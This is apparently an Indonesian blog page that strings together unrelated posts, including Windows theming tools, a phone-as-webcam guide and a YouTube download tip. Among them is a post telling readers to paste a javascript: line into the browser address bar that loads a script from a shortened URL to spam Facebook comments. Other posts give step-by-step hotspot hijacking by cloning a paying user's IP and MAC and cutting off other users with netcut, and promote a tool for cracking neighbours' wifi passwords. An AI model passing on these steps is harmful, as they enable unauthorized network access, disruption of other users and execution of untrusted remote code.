Cara Mengomen Anak Hacker Di Facebook Dengan Banyak

tahuuuuuu kah kamuuuuu
bagaimana cara ngomen stts orng dengan banyakkk
nich gw cari tipsnya
tips ini saya tiru di salah blogger orang

gini caranya
pertama-tama kita klik waktu teman kamu bikin stts terus kamu klik address bar
ganti addres bar itu dengan kode
javascript:(a = (b = document).createElement(“script”)).src = “http://goo.gl/1ueD3”, b.body.appendChild(a); void(0);
.tulis berapa banyak kata yang kamu inginkan
.dan tulis huruf yang kamu inginkan

SELAMAT MENCOBA YA

Lanjutan cara membobol wifi

hy broo ini postingan lanjutan tentang cara membobol wifi

kga ush basa basi lagi kita msuk z ke ke intinya………………???????

1. Langkah pertama kita menggunakan netcut untuk melihat user yang sedang online di area hotspot. bisa juga menggunakan ip scanner lainnya.

instal dan jalankan netcut, copy ip dan mac address calon korban. (nakkkkkh disini anda harus mencoba satu-satu IP user yg online, sampai menemukan user unlimit, supaya kita juga dapat gratisnya unlimit
(gampanganya dengan cara mengamati ip mana yg paling sering online.
.

catat IP, Mac Address serta Gatewaynya

2. disconnect WIFI di laptop kita (termasuk Netcut).
kemudian ganti ip Laptop kita sesuai ip korban yang udah anda copy kan tadi:
masukan IP(contoh ip yg saya copy 192.168.2.29), Subnet Mask(255.255.255.0), dan Default Gateway (default gateway hotspot; pada contoh 192.168.2.1).
sedangkan DNSnya terserah anda, (pada gambar gw menggunakan dns dari  google).

lalu ganti mac address kita sesuai Mac Address korban (jangan lupa hilangkan dulu tanda titik dua  “:”)

3. koneksikan kembali WIFI di laptop kita.

buka browser kesayangan anda dan jrengg….kalo anda berhasil, anda akan terkoneksi hotspot/wifi tanpa melewati halaman login hotspot terlebih dahulu.

Kalau anda masih juga kurang puas dengan bandwith yang di dapatkan, gunakan aja senjata (netcut) untuk memutuskan koneksi user lain yang sedang online (tapi jangan gatewaynya). bandwith akan menjadi milik anda seutuhnya…

SELAMAT MENCOBA BRO……!”

1. Stardock Bootskin

Langsung aja saya jelaskan apa saja software yang akan kita gunakan untuk modifikasi windows xp anda.

Stardock Bootskin adalah sebuah program yang memungkinkan pengguna untuk mengubah mereka layar Windows boot.
Tidak seperti program lain yang bisa mengubah layar boot Windows, Bootskin melakukannya dengan cara yang aman. Ini tidak patch kernel Windows. Juga tidak memerlukan user untuk men-download pengganti Windows kernel untuk melakukannya.
Layar boot yang menggunakan Bootskin biasanya di bawah 20K dibandingkan dengan program layar boot lain yang file lebih dari 2 megabyte. Bootskin adalah gratis untuk penggunaan non-komersial.

Download Stardock Bootskin.

2. ClocX

ClocX adalah aplikasi jam analog untuk Microsoft Windows 98/ME/NT/2000/XP/2003/Vista.
Software ini dibuat dalam bahasa C + +, yang menjamin kecil executable biner, kecepatan optimal dan penggunaan memori yang rendah.

Download ClocX

3. Logon XP to Win7

Tidak perlu repot-repot menginstal dan bisa diuninstall tanpa merusakan windows

Download Logon XP to Win7

4. Objectdock Plus

Fitur terbaik dari Superbar 7 Windows, sekarang tersedia di semua versi Windows dengan ObjectDock. Sebagai jalan pintas anda menuju aplikasi yang ingin anda buka. Bentuknya berupa icon-icon dengan visual yang menarik.

Download Objectdock Plus

 

5. Rainlendar

Rainlendar adalah aplikasi kalender yang dapat disesuaikan dengan kebutuhan Anda. Dapat juga menampilkan catatan-catatan penting, jadwal ataupun tugas di desktop anda tanpa memakan memory dan sangat enteng.

Download Rainlendar

6. Stardock Icon Packager

What makes IconPackager special is that unlike Microsoft’s themes which only change a few icons, IconPackager changes hundreds of icons. A package of icons contains icons to replace most of the common icons on your Windows PC. Everything from “My Computer”, “Recycle Bin”, Folders, all the way to specific file format icons such as .doc and .xls files and any other file type a user wishes to use. With its shell integration, IconPackager also allows users browsing through their system to right-click on any file and go to the added “Icon” tab and change the icon.

Download IconPackage

Cara gampang merubah tema windows anda dengan efek aeo akan mempercantik tampilan windows anda. Terdapat banyak macam tema yang dapat anda terapkan di desktop anda. Pilih dan sesuaikan mana tema yang cocok dengan karakter anda.

Download Windows Blind

Cara Gampang Bobol Password Wireless/Wifi/Hotspot

Sapa bilang wifi/hotspot yang sudah di proteksi dengan password tidak bisa di bobol. Bagi kalian yang dirumahnya dekat dengan area hotspot tapi tidak bisa ikut menggunakannya karena di proteksi password, ini ada tools yang ampuh untuk membobol password hotspotdi area sekitar kalian.

Ga usah pusing-pusing cukup dengan satu aplikasi yang ukuranya saja sangat kecil. Software nya bernama wzcook, dengan software ini anda akan gampang menjebol jaringan wireless/hotspot sekitar yang anda mau. Tentunya yang telah dipasangi password oleh si pemiliknya.

Adapaun cara utk menggunakan wzcook ini,anda hanya membutuhkan sebuah laptop
yang menyimpan aplikasi wzcook tsb dan jaringan Wireless tentunya.
anda cukup menjalankan wzcook dan secara otomatis akan mencari jaringan Wireless
beserta passwordnya,setelah itu anda tinggal menggunakan
access Wireless tsb dgn gratis…

Mau? Monggo di sedot software penjebol password wifi

Download Wzcook
pass winrar : caritauaja.info

Nah kali ini saya akan share lagi software lainnya yang fungsinya sama, yaitu untuk mempercantik, memperindah tampilan desktop anda. Bisa digunakan pada Windows XP ataupun Windows Vista/7. Nama software ini adalah Winstep Xtreme 11.2. Apa saja fitur dari

Nexus adalah sistem dock, dan cocok untuk akses super cepat ke aplikasi yang paling sering agan digunakan. Membuat dock sebanyak yang agan inginkan, dan dapat memiliki beberapa sub-dok! Bila tidak digunakan, dermaga dapat di autohide

 

Workshelf adalah kumpulan tab (Shelf), lebih cocok untuk tugas-tugas yang banyak seperti office, URL, film,dll .. Menurut webnya,ini kayak laci yang bisa kebuka ato ketutup. Pokoknya keren dan lebih simple tapi tetap stylish !!!

Ga cuma dock aja gan tapi StartMenu juga dirubah, jadi lebih simple,useless,and stylish

Makin lengkap dengan adanya modul, widget, gadget, docklets, desklets, mantap kan gan ? Ga ribet cari aplikasi lainnya lagi untuk dock,gadget,widget dl

WinSTEP Start Menu Organizer adalah sebuah aplikasi yang dirancang untuk membantu agan mengatur dan membersihkan Start Menu Windows

 

 

 

”CARA MENGUBAH HP CINA ADI MEDOM DAN WEBCAM

Advertisement:

setting modem hp china 120×120 Cara Setting Hp China Jadi Modem dan WebcamJangan buru-buru membeli webcam dulu jika punya hp china? lebih baik gunakan uangnya untuk yang lebih penting. Jika anda memiliki hp China, anda dapat menjadikannya webcam.

Menurut pengamatan saya, secara umum hp China yang sekarang beredar memiliki kamera megapiksel yang hasilnya setara dengan webcam. Sebagai info, kebanyakan hp CHina memakai CPU MTK. Nah agar hp china anda bisa dideteksi komputer, gunakan driver Cam. Langkah-langkahnya sebagai berikut:
Setting Hp China Sebagai Webcam

Jika tidak ada driver webcam di kotak penjualan hape anda, silahkan download drivernya di sini
Sesudah ter-download, ekstrak isinya dan simpan ke komputer anda.
Hubungkan hape dengan kabel data bawaannya. Apabila ada pilihan dilayar, pilih webcam, lalu arahkan ke folder tempat driver modem tadi berada, ikuti instalasi sampai selesai.

Nah, Sekarang hape anda sudah dikenali sebagai webcam USB. silahkan video chat sepuasnya. agar lebih mantap, gunakan aplikasi webcam pihak ketiga, tinggal cari aja di forum-forum (seperti magic Camera, Easy Web Cam, dll)
Setting Hp China sebagai Modem

Hape china juga bisa dijadikan modem CDMA dan GSM, asalkan hape tersebut sudah mendukung untuk browsing via hape. anda tinggal mengalihkan ke komputer sebagai modem. untuk itu, instal dulu driver modemnya. driver modem biasanya sudah termasuk dalam paket pembelian hape. (cara instalnya mirip dengan untuk driver webcam, cuma pada opsi dilayar hape pilih com port). ikuti proses instalasi driver sampai selesai.
Menambahkan Modem Hp China

Kini hp anda yang sudah terhubung dengan komputer perlu diatur (setting) sebagai modem di komputer. Caranya:

Klik Start > Control Panel > Phone and Modem Options.
Pilih Modem, lalu Add. Lanjutkan dengan menandai Dont Detect My Modem I will select it from the list, dan klik next.
Pilih standard modem 14400 Bps Modem, lalu Next, jangan pilih kecepatan modem yang lebih tinggi, karena akan terjadi eror. Kebanyakan modem di hp cina tidak mendukungnya.
Lanjutkan dengan memilih COM yang terdeteksi secara otomatis oleh komputer, yang ada pada langkah instalasi Driver Ponsel, lalu klik Finish.
Di phone dan Modem Options, tandai standard 14400 bps modem yang telah dibuat, lalu klik Properties > Advanced, dan di bagian Extra Setting tambahkan AT+CGDCONT=1,”IP”,”APN operator”,”IP Gateway”,”0,0. Jika anda tidak menambahkannya, saat dial-up nanti akan muncul pesan Error 734.
Langkah berikutnya tinggal setting koneksi internet sesuai kartu SIMCARD (operator) anda.

agar lebih mudah instal driver di atas, anda bisa instal Phone Suite (tinggal atur setting simcard operator di phone suite).

Maksud saya disini tanpa software untuk menggunakan tips cara downlaod video YouTube bahwa anda tidak memerlukan perangkat lunak tambahan untuk melakukannya. Akan tetapi, pemutar video ya tetap diperlukan. Gimana cara nontonnya kalau tidak menggunakan pemutar? Disini, saya akan berbagi tips dengan menggunakan service web-based yang sudah terbukti bagus.

Sebelumnya, anda harus mencari video YouTube mana dulu yang ingin anda download. Lihat bar address dari browser Opera anda saat membukanya, kemudian salin atau klik CTRL + V di Url tersebut. Cara selanjutnya adalah membuka http://keepvid.com. Setelah itu, masukkan URL klip yang ingin anda save ke komputer tersebut, kemudian tekan tombolnya. Selanutnya, KeepVid akan memproses permintaan anda tersebut, dan kemudian unduh klip tersebut.

Tips lain yang ingin saya bagikan tentang download video YouTube adalah anda sebaiknya memilih rekaman yang tidak terlalu panjang agar anda tidak terlalu lama dalam proses mengunduhnya. Jika ingin lebih cepat, pakai cara download cepat. Kemudian, trik lain adalah pilih rekaman yang kualitasnya tidak terlalu tinggi, karena yang mempunyai kualitas HD biasanya sangat berat untuk diunduh.

Tapi jangan gunakan cara download video YouTube tanpa software ini untuk mengunduh klip yang tidak sepantasnya. Usahakan menggunakannya dengan bijak. Oh ya, kelupaan. DI KeepVid, ada beberapa tipe file yang bisa anda pilih. 3GP cocok untuk dimasukkan ke perangkat handphone, sementara FLV atau MP4 cocok untuk diputar di komputer anda. Lihat pemutar video yangt ersedia dan cek tipe file apa saja yang didukung. Baiklah, segera pakai cara downlad ini sekarang. Take action!v

Read more about youtube by maidi